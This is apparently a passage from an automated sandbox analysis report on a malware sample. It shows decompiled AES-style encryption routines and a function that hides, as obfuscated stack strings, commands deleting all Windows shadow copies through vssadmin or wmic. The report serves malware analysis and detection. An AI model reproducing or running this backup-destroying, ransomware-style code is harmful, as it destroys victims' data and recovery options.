							_t712 = _t1167[2] ^  *(0xfc6a240 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t702 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t581 & 0x000000ff) * 4);
							_t739 = _t1167[3] ^  *(0xfc6a240 + (_t842 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t702 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t737 & 0x000000ff) * 4);
							_t997 =  *_t1179;
							_t513 =  *(0xfc6a240 + (_t578 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t580 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t843 & 0x000000ff) * 4) ^  *(0xfc6aa40 + (_t737 & 0x000000ff) * 4) ^  *_t997;
							_t585 =  *(0xfc6aa40 + (_t843 & 0x000000ff) * 4) ^  *(0xfc6a640 + (_t736 & 0x000000ff) * 4) ^  *(0xfc6a240 + (_t580 & 0x000000ff) * 4) ^  *(0xfc6ae40 + (_t581 & 0x000000ff) * 4) ^ _t997[1];
							goto L5;
						} else {
							_t564 = 0xffffffff;
						}
					}
				}
				return _t564;
			}












































































































































                                        0x0fc61023
                                        0x0fc61027
                                        0x0fc6102b
                                        0x0fc6102f
                                        0x0fc61033
                                        0x0fc61042
                                        0x0fc61046
                                        0x0fc6104d
                                        0x0fc61050
                                        0x0fc61053
                                        0x0fc61056
                                        0x0fc6105f
                                        0x0fc613c7
                                        0x0fc613c7
                                        0x0fc613ca
                                        0x0fc613d3
                                        0x0fc61424
                                        0x0fc61426
                                        0x0fc6145b
                                        0x0fc6145e
                                        0x0fc6148b
                                        0x0fc6148d
                                        0x0fc6148f
                                        0x0fc61492
                                        0x0fc61495
                                        0x0fc61498
                                        0x0fc6149b
                                        0x0fc614a4
                                        0x0fc614f5
                                        0x0fc614f7
                                        0x0fc6152c
                                        0x0fc6152f
                                        0x0fc6155c
                                        0x0fc6155e
                                        0x0fc61560
                                        0x0fc61563
                                        0x0fc61566
                                        0x0fc61569
                                        0x0fc6156c
                                        0x0fc61575
                                        0x0fc615c6
                                        0x0fc615c8
                                        0x0fc615fd
                                        0x0fc61600
                                        0x0fc6162d
                                        0x0fc6162f
                                        0x0fc61631
                                        0x0fc61634
                                        0x0fc61637
                                        0x0fc6163a
                                        0x0fc6163d
                                        0x0fc61646
                                        0x0fc61697
                                        0x0fc61699
                                        0x0fc616ce
                                        0x0fc616d1
                                        0x0fc616fe
                                        0x0fc61700
                                        0x0fc61702
                                        0x0fc61705
                                        0x0fc61708
                                        0x0fc6170b
                                        0x0fc6170e
                                        0x0fc61717
                                        0x0fc61768
                                        0x0fc6176a
                                        0x0fc6179f
                                        0x0fc617a2
                                        0x0fc617cf
                                        0x0fc617d1
                                        0x0fc617d3
                                        0x0fc617d6
                                        0x0fc617d9
                                        0x0fc617dc
                                        0x0fc617df
                                        0x0fc617e8
                                        0x0fc61839
                                        0x0fc6183b
                                        0x0fc61870
                                        0x0fc61873
                                        0x0fc618a0
                                        0x0fc618a2
                                        0x0fc618a4
                                        0x0fc618a7
                                        0x0fc618aa
                                        0x0fc618ad
                                        0x0fc618b0
                                        0x0fc618b9
                                        0x0fc6190a
                                        0x0fc6190c
                                        0x0fc61941
                                        0x0fc61944
                                        0x0fc61971
                                        0x0fc61973
                                        0x0fc61975
                                        0x0fc61978
                                        0x0fc6197b
                                        0x0fc6197e
                                        0x0fc61981
                                        0x0fc6198a
                                        0x0fc619db
                                        0x0fc619dd
                                        0x0fc61a12
                                        0x0fc61a15
                                        0x0fc61a42
                                        0x0fc61a44
                                        0x0fc61a46
                                        0x0fc61a49
                                        0x0fc61a4c
                                        0x0fc61a4f
                                        0x0fc61a52
                                        0x0fc61a5b
                                        0x0fc61aac
                                        0x0fc61aae
                                        0x0fc61ae3
                                        0x0fc61ae6
                                        0x0fc61b13
                                        0x0fc61b15
                                        0x0fc61b17
                                        0x0fc61b1a
                                        0x0fc61b1d
                                        0x0fc61b20
                                        0x0fc61b23
                                        0x0fc61b2c
                                        0x0fc61b7d
                                        0x0fc61b7f
                                        0x0fc61bb4
                                        0x0fc61bb7
                                        0x0fc61be4
                                        0x0fc61bed
                                        0x0fc61bf1
                                        0x0fc61bf3
                                        0x0fc61bf6
                                        0x0fc61bf9
                                        0x0fc61bfc
                                        0x0fc61065
                                        0x0fc6106b
                                        0x0fc61225
                                        0x0fc61225
                                        0x0fc61228
                                        0x0fc61231
                                        0x0fc61282
                                        0x0fc61284
                                        0x0fc612b9
                                        0x0fc612bc
                                        0x0fc612e9
                                        0x0fc612eb
                                        0x0fc612ed
                                        0x0fc612f0
                                        0x0fc612f3
                                        0x0fc612f6
                                        0x0fc612f9
                                        0x0fc61302
                                        0x0fc61353
                                        0x0fc61355
                                        0x0fc6138a
                                        0x0fc6138d
                                        0x0fc613ba
                                        0x0fc613bc
                                        0x0fc613be
                                        0x0fc613c1
                                        0x0fc613c4
                                        0x00000000
                                        0x0fc61071
                                        0x0fc61077
                                        0x0fc61083
                                        0x0fc61086
                                        0x0fc6108f
                                        0x0fc610e0
                                        0x0fc610e2
                                        0x0fc61117
                                        0x0fc6111a
                                        0x0fc61147
                                        0x0fc61149
                                        0x0fc6114b
                                        0x0fc6114e
                                        0x0fc61151
                                        0x0fc61154
                                        0x0fc61157
                                        0x0fc61160
                                        0x0fc611b1
                                        0x0fc611b3
                                        0x0fc611e8
                                        0x0fc611eb
                                        0x0fc61218
                                        0x0fc6121a
                                        0x0fc6121c
                                        0x0fc6121f
                                        0x0fc61222
                                        0x00000000
                                        0x0fc61079
                                        0x0fc61079
                                        0x0fc61079
                                        0x0fc61077
                                        0x0fc6106b
                                        0x0fc61c11

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 316a5c89e61f296ee320ccade8f13c8994a2d5fbed1f54608f3de79061ce686e
                                        • Instruction ID: 23555ca7537798ab40a4e59e24263215a6e6f0886d7224606d8c89a3760489a2
                                        • Opcode Fuzzy Hash: 316a5c89e61f296ee320ccade8f13c8994a2d5fbed1f54608f3de79061ce686e
                                        • Instruction Fuzzy Hash: 83625A31C0827A8FDB80DF6FE48612673A2EB54333B4A4526FB446B295D63C7534AB74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC683C0 Relevance: .4, Instructions: 395COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0FC683C0(signed int _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _t274;
				signed int _t284;
				signed int _t287;
				unsigned int _t289;
				intOrPtr _t297;
				signed int _t306;
				signed int _t309;
				unsigned int _t311;
				intOrPtr _t319;
				signed int _t328;
				signed int _t331;
				unsigned int _t333;
				intOrPtr _t341;
				signed int _t350;
				signed int _t353;
				unsigned int _t355;
				intOrPtr _t363;
				signed int _t372;
				signed int _t375;
				unsigned int _t377;
				intOrPtr _t385;
				signed int _t394;
				signed int _t397;
				unsigned int _t399;
				intOrPtr _t407;
				signed int _t416;
				intOrPtr* _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed char _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t441;
				intOrPtr _t442;
				signed int _t458;
				intOrPtr _t459;
				signed int _t475;
				intOrPtr _t476;
				signed int _t492;
				intOrPtr _t493;
				signed int _t509;
				intOrPtr _t510;
				signed int _t526;
				intOrPtr _t527;
				signed int _t542;
				signed int _t543;
				signed int _t544;
				signed int _t545;
				signed int _t546;
				signed int _t547;
				signed int _t548;
				signed int _t549;
				signed int _t551;
				signed int _t553;
				signed int _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				intOrPtr _t568;

				_t274 = _a4;
				_t420 = _a8;
				_t428 =  *_t274;
				_v12 = _t428;
				 *_t420 = _t428;
				_t429 =  *((intOrPtr*)(_t274 + 4));
				 *((intOrPtr*)(_t420 + 4)) = _t429;
				_v16 = _t429;
				_t430 =  *((intOrPtr*)(_t274 + 8));
				 *((intOrPtr*)(_t420 + 8)) = _t430;
				_v8 = _t430;
				_t431 =  *((intOrPtr*)(_t274 + 0xc));
				 *((intOrPtr*)(_t420 + 0xc)) = _t431;
				_t543 =  *(_t274 + 0x10);
				 *(_t420 + 0x10) = _t543;
				_t561 =  *(_t274 + 0x14);
				 *(_t420 + 0x14) = _t561;
				_a4 = _t431;
				_t553 =  *(_t274 + 0x18);
				 *(_t420 + 0x18) = _t553;
				_t421 =  *(_t274 + 0x1c);
				 *(_a8 + 0x1c) = _t421;
				_t284 = _v12 ^  *(0xfc6ba40 + (_t421 >> 0x18) * 4) ^  *(0xfc6b640 + (_t421 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t421 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t421 & 0x000000ff) * 4) ^  *0xfc6a200;
				_v12 = _t284;
				 *(_a8 + 0x20) = _t284;
				_t441 = _v16 ^ _t284;
				_v16 = _t441;
				 *(_a8 + 0x24) = _t441;
				_t287 = _v8 ^ _t441;
				_t442 = _a8;
				_v8 = _t287;
				 *(_t442 + 0x28) = _t287;
				_t289 = _a4 ^ _v8;
				 *(_t442 + 0x2c) = _t289;
				_a4 = _t289;
				_t297 = _a8;
				_t544 = _t543 ^  *(0xfc6be40 + (_t289 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t289 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
				_t562 = _t561 ^ _t544;
				_t554 = _t553 ^ _t562;
				_t422 = _t421 ^ _t554;
				 *(_t297 + 0x30) = _t544;
				 *(_t297 + 0x34) = _t562;
				 *(_t297 + 0x38) = _t554;
				 *(_t297 + 0x3c) = _t422;
				_t306 = _v12 ^  *(0xfc6ba40 + (_t422 >> 0x18) * 4) ^  *(0xfc6b640 + (_t422 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t422 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t422 & 0x000000ff) * 4) ^  *0xfc6a204;
				_v12 = _t306;
				 *(_a8 + 0x40) = _t306;
				_t458 = _v16 ^ _t306;
				_v16 = _t458;
				 *(_a8 + 0x44) = _t458;
				_t309 = _v8 ^ _t458;
				_t459 = _a8;
				_v8 = _t309;
				 *(_t459 + 0x48) = _t309;
				_t311 = _a4 ^ _v8;
				 *(_t459 + 0x4c) = _t311;
				_a4 = _t311;
				_t319 = _a8;
				_t545 = _t544 ^  *(0xfc6be40 + (_t311 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t311 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
				_t563 = _t562 ^ _t545;
				_t555 = _t554 ^ _t563;
				_t423 = _t422 ^ _t555;
				 *(_t319 + 0x50) = _t545;
				 *(_t319 + 0x54) = _t563;
				 *(_t319 + 0x58) = _t555;
				 *(_t319 + 0x5c) = _t423;
				_t328 = _v12 ^  *(0xfc6ba40 + (_t423 >> 0x18) * 4) ^  *(0xfc6b640 + (_t423 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t423 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t423 & 0x000000ff) * 4) ^  *0xfc6a208;
				_v12 = _t328;
				 *(_a8 + 0x60) = _t328;
				_t475 = _v16 ^ _t328;
				_v16 = _t475;
				 *(_a8 + 0x64) = _t475;
				_t331 = _v8 ^ _t475;
				_t476 = _a8;
				_v8 = _t331;
				 *(_t476 + 0x68) = _t331;
				_t333 = _a4 ^ _v8;
				 *(_t476 + 0x6c) = _t333;
				_a4 = _t333;
				_t341 = _a8;
				_t546 = _t545 ^  *(0xfc6be40 + (_t333 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t333 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
				_t564 = _t563 ^ _t546;
				_t556 = _t555 ^ _t564;
				_t424 = _t423 ^ _t556;
				 *(_t341 + 0x70) = _t546;
				 *(_t341 + 0x74) = _t564;
				 *(_t341 + 0x78) = _t556;
				 *(_t341 + 0x7c) = _t424;
				_t350 = _v12 ^  *(0xfc6ba40 + (_t424 >> 0x18) * 4) ^  *(0xfc6b640 + (_t424 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t424 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t424 & 0x000000ff) * 4) ^  *0xfc6a20c;
				_v12 = _t350;
				 *(_a8 + 0x80) = _t350;
				_t492 = _v16 ^ _t350;
				_v16 = _t492;
				 *(_a8 + 0x84) = _t492;
				_t353 = _v8 ^ _t492;
				_t493 = _a8;
				_v8 = _t353;
				 *(_t493 + 0x88) = _t353;
				_t355 = _a4 ^ _v8;
				 *(_t493 + 0x8c) = _t355;
				_a4 = _t355;
				_t363 = _a8;
				_t547 = _t546 ^  *(0xfc6be40 + (_t355 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t355 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
				_t565 = _t564 ^ _t547;
				_t557 = _t556 ^ _t565;
				 *(_t363 + 0x90) = _t547;
				 *(_t363 + 0x94) = _t565;
				 *(_t363 + 0x98) = _t557;
				_t425 = _t424 ^ _t557;
				 *(_t363 + 0x9c) = _t425;
				_t372 = _v12 ^  *(0xfc6ba40 + (_t425 >> 0x18) * 4) ^  *(0xfc6b640 + (_t425 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t425 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t425 & 0x000000ff) * 4) ^  *0xfc6a210;
				_v12 = _t372;
				 *(_a8 + 0xa0) = _t372;
				_t509 = _v16 ^ _t372;
				_v16 = _t509;
				 *(_a8 + 0xa4) = _t509;
				_t375 = _v8 ^ _t509;
				_t510 = _a8;
				_v8 = _t375;
				 *(_t510 + 0xa8) = _t375;
				_t377 = _a4 ^ _v8;
				 *(_t510 + 0xac) = _t377;
				_a4 = _t377;
				_t385 = _a8;
				_t548 = _t547 ^  *(0xfc6be40 + (_t377 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t377 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
				_t566 = _t565 ^ _t548;
				_t558 = _t557 ^ _t566;
				_t426 = _t425 ^ _t558;
				 *(_t385 + 0xb0) = _t548;
				 *(_t385 + 0xb4) = _t566;
				 *(_t385 + 0xb8) = _t558;
				 *(_t385 + 0xbc) = _t426;
				_t394 = _v12 ^  *(0xfc6ba40 + (_t426 >> 0x18) * 4) ^  *(0xfc6b640 + (_t426 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t426 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t426 & 0x000000ff) * 4) ^  *0xfc6a214;
				_v12 = _t394;
				 *(_a8 + 0xc0) = _t394;
				_t526 = _v16 ^ _t394;
				_v16 = _t526;
				 *(_a8 + 0xc4) = _t526;
				_t397 = _v8 ^ _t526;
				_t527 = _a8;
				_v8 = _t397;
				 *(_t527 + 0xc8) = _t397;
				_t399 = _a4 ^ _v8;
				 *(_t527 + 0xcc) = _t399;
				_a4 = _t399;
				_t407 = _a8;
				_t549 = _t548 ^  *(0xfc6be40 + (_t399 >> 0x18) * 4) ^  *(0xfc6ba40 + (_t399 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b640 + (_a4 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_a4 & 0x000000ff) * 4);
				_t567 = _t566 ^ _t549;
				_t559 = _t558 ^ _t567;
				_t427 = _t426 ^ _t559;
				 *(_t407 + 0xd4) = _t567;
				_t568 = _t407;
				 *(_t407 + 0xd0) = _t549;
				 *(_t568 + 0xd8) = _t559;
				 *(_t568 + 0xdc) = _t427;
				_t416 = _v12 ^  *(0xfc6ba40 + (_t427 >> 0x18) * 4) ^  *(0xfc6b640 + (_t427 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xfc6b240 + (_t427 >> 0x00000008 & 0x000000ff) * 4) ^  *(0xfc6be40 + (_t427 & 0x000000ff) * 4) ^  *0xfc6a218;
				 *((intOrPtr*)(_t568 + 0xf0)) = 0;
				_t542 = _v16 ^ _t416;
				 *(_t568 + 0xe0) = _t416;
				_t551 = _v8 ^ _t542;
				 *(_t568 + 0xe4) = _t542;
				 *(_t568 + 0xec) = _a4 ^ _t551;
				 *(_t568 + 0xe8) = _t551;
				 *((char*)(_t568 + 0xf0)) = 0xe0;
				return 0;
			}
















































































                                        0x0fc683c6
                                        0x0fc683ca
                                        0x0fc683ce
                                        0x0fc683d0
                                        0x0fc683d3
                                        0x0fc683d5
                                        0x0fc683d8
                                        0x0fc683db
                                        0x0fc683de
                                        0x0fc683e1
                                        0x0fc683e4
                                        0x0fc683e7
                                        0x0fc683ea
                                        0x0fc683ed
                                        0x0fc683f0
                                        0x0fc683f3
                                        0x0fc683f6
                                        0x0fc683f9
                                        0x0fc683fd
                                        0x0fc68400
                                        0x0fc68403
                                        0x0fc6840e
                                        0x0fc68449
                                        0x0fc6844e
                                        0x0fc68451
                                        0x0fc68457
                                        0x0fc6845c
                                        0x0fc6845f
                                        0x0fc68465
                                        0x0fc68467
                                        0x0fc6846a
                                        0x0fc6846d
                                        0x0fc68473
                                        0x0fc68476
                                        0x0fc6847b
                                        0x0fc684b2
                                        0x0fc684b5
                                        0x0fc684b7
                                        0x0fc684b9
                                        0x0fc684bb
                                        0x0fc684bd
                                        0x0fc684c0
                                        0x0fc684c3
                                        0x0fc684c6
                                        0x0fc68506
                                        0x0fc6850b
                                        0x0fc6850e
                                        0x0fc68514
                                        0x0fc68519
                                        0x0fc6851c
                                        0x0fc68522
                                        0x0fc68524
                                        0x0fc68527
                                        0x0fc6852a
                                        0x0fc68530
                                        0x0fc68533
                                        0x0fc68538
                                        0x0fc6856f
                                        0x0fc68572
                                        0x0fc68574
                                        0x0fc68576
                                        0x0fc68578
                                        0x0fc6857a
                                        0x0fc6857f
                                        0x0fc68582
                                        0x0fc68585
                                        0x0fc685c3
                                        0x0fc685c8
                                        0x0fc685cb
                                        0x0fc685d1
                                        0x0fc685d6
                                        0x0fc685d9
                                        0x0fc685df
                                        0x0fc685e1
                                        0x0fc685e4
                                        0x0fc685e7
                                        0x0fc685ed
                                        0x0fc685f0
                                        0x0fc685f5
                                        0x0fc6862c
                                        0x0fc6862f
                                        0x0fc68631
                                        0x0fc68633
                                        0x0fc68635
                                        0x0fc68637
                                        0x0fc6863c
                                        0x0fc6863f
                                        0x0fc68642
                                        0x0fc68680
                                        0x0fc68685
                                        0x0fc68688
                                        0x0fc68691
                                        0x0fc68696
                                        0x0fc68699
                                        0x0fc686a2
                                        0x0fc686a4
                                        0x0fc686a7
                                        0x0fc686aa
                                        0x0fc686b3
                                        0x0fc686b6
                                        0x0fc686be
                                        0x0fc686f5
                                        0x0fc686f8
                                        0x0fc686fa
                                        0x0fc686fc
                                        0x0fc686fe
                                        0x0fc68704
                                        0x0fc6870a
                                        0x0fc68710
                                        0x0fc68712
                                        0x0fc68755
                                        0x0fc6875a
                                        0x0fc6875d
                                        0x0fc68766
                                        0x0fc6876b
                                        0x0fc6876e
                                        0x0fc68777
                                        0x0fc68779
                                        0x0fc6877c
                                        0x0fc6877f
                                        0x0fc68788
                                        0x0fc6878b
                                        0x0fc68793
                                        0x0fc687ca
                                        0x0fc687cd
                                        0x0fc687cf
                                        0x0fc687d1
                                        0x0fc687d3
                                        0x0fc687d5
                                        0x0fc687dd
                                        0x0fc687e3
                                        0x0fc687e9
                                        0x0fc6882a
                                        0x0fc6882f
                                        0x0fc68832
                                        0x0fc6883b
                                        0x0fc68840
                                        0x0fc68843
                                        0x0fc6884c
                                        0x0fc6884e
                                        0x0fc68851
                                        0x0fc68854
                                        0x0fc6885d
                                        0x0fc68860
                                        0x0fc68868
                                        0x0fc6889f
                                        0x0fc688a2
                                        0x0fc688a4
                                        0x0fc688a6
                                        0x0fc688a8
                                        0x0fc688aa
                                        0x0fc688b2
                                        0x0fc688b4
                                        0x0fc688c5
                                        0x0fc688cb
                                        0x0fc68905
                                        0x0fc68907
                                        0x0fc68914
                                        0x0fc68916
                                        0x0fc6891f
                                        0x0fc68923
                                        0x0fc68929
                                        0x0fc68931
                                        0x0fc68937
                                        0x0fc68943

                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cae4c3427bf36a78a052d0018d054dff979a8e6e0260708321e78fb5444478cc
                                        • Instruction ID: 8effdc153ed88afccdeecbf981a4134ba51a0367747c3ec3ffedcea99079af08
                                        • Opcode Fuzzy Hash: cae4c3427bf36a78a052d0018d054dff979a8e6e0260708321e78fb5444478cc
                                        • Instruction Fuzzy Hash: C012EA70A141199FCB48CF2AD491A6AB7F1FF8D311B4280AEE90ADB381C735EA51DB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC65EC0 Relevance: .3, Instructions: 346COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
                                        • Instruction ID: 8ff4464bdc5c48267d963a9817f6f5d4a1b4ea3624731e63552dc11d26e032c0
                                        • Opcode Fuzzy Hash: 794c13284e084b999102786f7c7132ff237cb24c9401df5e3aaca089a4b1fbef
                                        • Instruction Fuzzy Hash: FCD19675A0821A8FCB20CF58C8C1BAAB7B1BF48314F6945A9D855AF342D735FA51DB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC643E0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99memorystringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0FC643E0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FC63B20(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}



















































                                        0x0fc643f6
                                        0x0fc64492
                                        0x0fc6449c
                                        0x0fc644a4
                                        0x0fc644ac
                                        0x0fc644b0
                                        0x0fc644b8
                                        0x0fc644bc
                                        0x0fc644c4
                                        0x0fc644c9
                                        0x0fc644d1
                                        0x0fc644d9
                                        0x0fc644e1
                                        0x0fc644e9
                                        0x0fc644f1
                                        0x0fc644f9
                                        0x0fc64504
                                        0x0fc6450f
                                        0x0fc6451a
                                        0x0fc64525
                                        0x0fc64530
                                        0x0fc6453b
                                        0x0fc64546
                                        0x0fc64551
                                        0x0fc6455c
                                        0x0fc64567
                                        0x0fc64572
                                        0x0fc6457d
                                        0x0fc643fc
                                        0x0fc643fe
                                        0x0fc64406
                                        0x0fc6440e
                                        0x0fc64412
                                        0x0fc6441a
                                        0x0fc6441e
                                        0x0fc64426
                                        0x0fc6442e
                                        0x0fc64436
                                        0x0fc6443e
                                        0x0fc64443
                                        0x0fc6444b
                                        0x0fc64453
                                        0x0fc6445b
                                        0x0fc64463
                                        0x0fc6446b
                                        0x0fc64473
                                        0x0fc6447b
                                        0x0fc64483
                                        0x0fc64483
                                        0x0fc64596
                                        0x0fc645a5
                                        0x0fc645a9
                                        0x0fc645b5
                                        0x0fc645bd
                                        0x0fc645d3
                                        0x0fc645db
                                        0x0fc645dd
                                        0x0fc645ab
                                        0x0fc645ab
                                        0x0fc645ab
                                        0x0fc645e7
                                        0x0fc645f5

                                        APIs
                                          • Part of subcall function 0FC63B20: _memset.LIBCMT ref: 0FC63B72
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FC63B96
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FC63B9A
                                          • Part of subcall function 0FC63B20: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FC63B9E
